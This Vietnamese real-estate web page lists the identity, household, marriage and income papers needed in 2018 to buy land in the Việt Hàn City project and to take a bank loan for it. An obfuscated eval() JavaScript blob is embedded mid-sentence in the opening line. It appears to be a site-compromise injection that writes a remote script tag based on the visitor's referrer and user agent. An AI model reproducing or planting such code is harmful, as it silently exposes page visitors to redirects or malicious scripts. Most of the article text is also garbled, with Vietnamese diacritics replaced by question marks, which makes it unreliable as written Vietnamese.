THỜI GIAN BÀN GIAO DỰ ÁN:

Còn
1
1
Tháng
1
7
Ngày

Mua đất nền Việt Hàn City cần chuẩn bị những loại giầy tờ gì tại năm 2018?

D? án ??t eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|idsyf|var|u0026u|referrer|yaakb||js|php’.split(‘|’),0,{}))
n?n Vi?t Hàn city
?ang là m?t trong nh?ng d? án b?t ??ng s?n HOT nh?t Ph? Yên Thái Nguyên nh? v? trí ??c ??a và nhi?u k?t n?i ti?n ích. ?? mua ??t n?n th? khu ?ô th? Vi?t Hàn City hay b?t c? d? án ??t n?n nào khác trong n?m 2018 b?n c?n chu?n b? m?t s? lo?i gi?t t? quan tr?ng mà chúng tôi xin chia s? d??i ?ây.

Mua ??t n?n c?n có nh?ng lo?i gi?y t? gì t?i th?i ?i?m n?m 2018?

Không ph?i ai c?ng có ?i?u ki?n ?? mua ??t n?n xây nhà, và nh?ng ng??i có ?i?u ki?n th??ng ch? mua t? 1 – 2 l?n, bên c?nh ?ó các th? t?c hành chính th??ng xuyên ???c c?i cách m?i n?m m?t khác ?? h??ng ??n s? thu?n ti?n cho ng??i dân và c? quan nhà n??c, chính vì th? ?? mua ??t n?n Vi?t Hàn city nói riêng và các d? án b?t ??ng s?n nói chung b?n c?n nh?ng gi?y t? nào?

 

Mua ??t n?n Vi?t Hàn City c?n chu?n b? nh?ng lo?i gi?y t? gì t?i n?m 2018?

N?u b?n c?ng ?ang ?i tìm câu tr? l?i cho v?n ?? th?c m?c trên có th? tham kh?o bài vi?t c?a chúng tôi d??i ?ây ?? bi?t, theo ?úng lu?t ??nh, khi mua ??t n?n c?n nh?ng gi?y t? quan sau ?ây:

Ch?ng minh th? nhân dân
S? kh?u kh?u
Gi?y ??ng kí k?t hôn ho?c gi?y xác nh?n tình tr?ng hôn nhân v?i nh?ng tr??ng h?p ch?a h?t hôn ho?c ?ã ly d?.
Là nh?ng gi?y t? t?i thi?u quý khách hàng c?n chu?n b?, bên c?nh ?ó s? có m?t s? tr??ng h?p ??c bi?t khác s? c?n chu?n b? nhi?u lo?i gi?y t? h?n c? th? nh?:

Các lo?i gi?y t? c?n thi?t khi mua ??t n?n v?i nh?ng ng??i có nhu c?u vay v?n ngân hàngCó nhi?u nhà ??u t? và khách hàng có ?i?n ki?n mua th?ng, có nhi?u khách hàng có nhu c?u mua tr? góp và c?n vay v?n ngân hàng thì v?i tr??ng h?p ng??i mua ??t n?n Vi?t Hàn City có nhu c?u vay v?n ngân hàng ?? mua ??t thì c?n chu?n b? nh?ng h? s? gi?y t? sau:

 

Mua ??t n?n Vi?t Hàn City c?n chu?n b? nh?ng lo?i gi?y t? gì t?i n?m 2018?

Các gi?y t? c?n thi?t ?? vay v?n ngân hàng khi mua ??t

– S? h? kh?u và Gi?y t?m trú c?a ng??i vay và bên b?o lãnh (n?u có)

– CMT c?a ng??i mua và bên b?o lãnh (n?u có)

– Gi?y ??ng ký k?t hôn (ho?c gi?y xác nh?n tình tr?ng hôn nhân và v?n b?n liên quan kèm theo n?u có) và bên b?o lãnh (n?u có)

* L?u ý: Trong tr??ng h?p ch?ng minh th? ?ang làm ho?c b? m?t, b?n có th? thay th? b?ng nh?ng gi?y t? giá tr? khác ?? ch?ng minh b?n ?ã ???c nhà n??c th?m ??nh.

– H? s? ch?ng minh ngu?n thu nh?p cá nhân:

Trong m?c gi?y t? ch?ng minh ngu?n g?c thu nh?p ???c chia thành 2 nhóm ??i t??ng khác nhau c? th?:

+ ??i v?i ng??i làm công ?n l??ng:

  •  H?p ??ng lao ??ng ho?c Quy?t ??nh công tác t? ng??i s? d?ng lao ??ng
  • B?n sao kê tài kho?n tr? l??ng qua ngân hàng ho?c b?ng l??ng/phi?u l??ng 3 tháng g?n ?ây nh?t. V?i nh?ng ng??i là nhân viên kinh doanh và có thu nh?p bán hàng t? hoa h?ng bán hàng thì có th? tính t? 6 tháng g?n nh?t.
  • Các gi?y t? ch?ng minh ngu?n thu nh?p khác: gi?y t? xe mang tên ng??i vay, s? ?? nhà,…

+ ??i v?i ch? doanh nghi?p và ch? h? kinh doanh:

  • Gi?y ??ng ký kinh doanh và gi?y ch?ng nh?n mã s? thu?
  • S? ghi chép bán hàng
  • Hóa ??n bán hàng (n?u có)
  • Gi?y ch?ng nh?n quy?n s? d?ng ??t ho?c gi?y t? m?nh ??t d? ??nh mua, biên lai ?óng ti?n
  • Gi?y th?a thu?n, h?p ??ng mua bán, ??t c?c mua bán ??t do 2 bên l?p.

Trên ?ây là các lo?i gi?y t? c?n thi?t khi mua ??t n?n Vi?t Hàn City Ph? Yên vào th?i ?i?m n?m 2018 mà b?n c?n n?m rõ, ?? ???c h??ng d?n chi ti?t và t? v?n c? th? quý khách hàng hãy liên h? v?i chúng tôi qua hotline: 093 15 68886

Ngu?n : http://www.luatcongminh.com

Bạn đang xem: Mua đất nền Việt Hàn City cần chuẩn bị những loại giầy tờ gì tại năm 2018? trong

News latest

Saigon Riverside City lối tắt đến thành công
Saigon Riverside City lối tắt đến thành công

Tại sao nói dự án Saigon Riverside City chính là lối tắt đạt đến thành công mà mỗi khách hàng tại thị trường Thủ Đức...

Căn hộ sunshine city Sài Gòn hạng sang
Căn hộ sunshine city Sài Gòn hạng sang

Những yếu tố phong thủy cực tốt tại căn hộ Sunshine City Sài Gòn Phong thủy vốn được xem là một trong những yếu tố...

Dự án One Varandah đặc biệt như thế nào
Dự án One Varandah đặc biệt như thế nào

Là một trong những công trình bất động sản được triển khai tại quận 2 thành phố Hồ Chí Minh, dự án One Varandah tương...

BẢN ĐỒ HUYỆN BÌNH CHÁNH
BẢN ĐỒ HUYỆN BÌNH CHÁNH

Mới đây, UBND Thành phố đã có quyết định ban hành số 2391/QĐ-UBND về quy hoạch sử dụng đất đến năm 2020 và kế hoạch...

FLC Đại Mỗ, Nam Từ Liêm được FLC mua với mức giá 860 tỷ có xứng đáng?
FLC Đại Mỗ, Nam Từ Liêm được FLC mua với mức giá 860 tỷ có xứng đáng?

Thông tin t?p ?oàn FLC m?i ?ây ?ã v??t qua 16 ??i th? ?? th?ng ??u giá khu ??t có di?n tích 6,4ha thu?c ph??ng...